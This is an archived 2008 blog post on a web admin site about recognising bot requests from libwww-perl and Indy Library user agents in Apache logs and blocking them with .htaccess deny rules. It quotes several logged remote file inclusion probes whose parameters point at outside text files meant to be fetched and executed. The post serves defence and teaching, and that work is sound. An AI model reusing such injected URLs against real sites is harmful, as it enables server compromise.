Home Accessibility Courses Twitter The Mouth Facebook Resources Site Map About Us Contact
libwww-perl and Indy Library in your server logs?

Here are some sample lines from our server logs ... and I don't like the look of them!

from - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24

from - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17

Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (which is also know as the "User Agent") - are very likely to be attempting to find a security hole in our site scripts, through which they can copy themselves onto our server and then continue to infect other systems, or to use our site to advertise their own by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?

Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...

libwww is from the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case, it's probable that someone has written an automated program In Perl ...

Automated programs are a necessity - and indeed we welcome well behaved crawlers from the well known Google and Yahoo through to more obscure ones too, but authors of such crawlers who know properly what they're doing change the User Agent string rather than using the default - in my experience, we really don't want the default crawlers on our site, which are at least 90% malicious, with the remaining 10% being amateur. So how can we turn them off?

Standard practise is to deny specific user agents via the robots.txt file - but chances are that the naughty bots won't respect that so we need to enforce the rule!

Here are three lines that I've added to our .htaccess file ...

SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys

Which will send out a 403 Forbidden message to the automata, telling them that they can't have the page they seek. Goodness knows what the receiveing bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.

How do we test that?

Here's a simple Perl script that will declare itself as being libwww:

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
$res = $ua->request($req);
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";

And when I run that, it now gives me:

-bash-3.2$ perl pg1
Error: 403 Forbidden

If I add the line:

$ua->agent("Well House Consultants Bot");

into that program, I get a much more satisfying result back ...

-bash-3.2$ perl pg2
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on

Links - full source code of our test program without and with our own user agent being set.

One of the matters that I considered very carefully indeed before blocking these use agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater if you like. Not the case, I believe - as most people who have legit babies take good care of them and name them properly, but I will be watching my log files none the less to check.

As I finished writing this article - some poetic justice from my log file ... - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty- programs-looking-for-security-holes-on-your- server-.html/errors.php?error= http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes and firmly being denied access.

(written 2008-09-13)

Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
A606 - Web Application Deployment - Apache httpd - log files and log tools
  [4491] Web Server Admin - some of those things that happen, and solutions - (2015-05-10)
  [4404] Which (virtual) host was visited? Tuning Apache log files, and Python analysis - (2015-01-23)
  [4307] Identifying and clearing denial of service attacks on your Apache server - (2014-09-27)
  [3984] 20 minutes in to our 15 minutes of fame - (2013-01-20)
  [3974] TV show appearance - how does it effect your web site? - (2013-01-13)
  [3670] Reading Google Analytics results, based on the relative populations of countries - (2012-03-24)
  [3554] Learning more about our web site - and learning how to learn about yours - (2011-12-17)
  [3491] Who is knocking at your web site door? Are you well set up to deal with allcomers? - (2011-10-21)
  [3447] Needle in a haystack - finding the web server overload - (2011-09-18)
  [3443] Getting more log information from the Apache http web server - (2011-09-16)
  [3087] Making the most of critical emails - reading behind the scene - (2010-12-16)
  [3027] Server logs - drawing a graph of gathered data - (2010-11-03)
  [3019] Apache httpd Server Status - monitoring your server - (2010-10-28)
  [3015] Logging the performance of the Apache httpd web server - (2010-10-25)
  [1780] Server overloading - turns out to be feof in PHP - (2008-09-01)
  [1761] Logging Cookies with the Apache httpd web server - (2008-08-20)
  [1656] Be careful of misreading server statistics - (2008-05-28)
  [1598] Every link has two ends - fixing 404s at the recipient - (2008-04-02)
  [1503] Web page (http) error status 405 - (2008-01-12)
  [1237] What proportion of our web traffic is robots? - (2007-06-19)
  [376] What brings people to my web site? - (2005-07-13)

Back to
What have iTime, honeytrapagency and domain listing center got in common?
Previous and next
Horse's mouth home
Forward to
I have been working hard but I do not expect you noticed
Some other Articles
Spiders Web
Regular Expressions in PHP
What does an browser understand? What does an HTML document contain?
I have been working hard but I do not expect you noticed
libwww-perl and Indy Library in your server logs?
What have iTime, honeytrapagency and domain listing center got in common?
Refactoring - a PHP demo becomes a production page
Which country does a search engine think you are located in?
All the pieces fall into place - hotel and courses
The road ahead - Python 3
4722 posts, page by page
Link to page ... 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95 at 50 posts per page

This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.

Link to Ezine home page (for reading).
Link to Blogging home page (to add comments).

You can Add a comment or ranking to this page

© WELL HOUSE CONSULTANTS LTD., 2017: Well House Manor • 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • FAX: 01144 1225 899360 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.net/mouth/1796_lib ... logs-.html • PAGE BUILT: Sat Jun 11 12:16:26 2016 • BUILD SYSTEM: WomanWithCat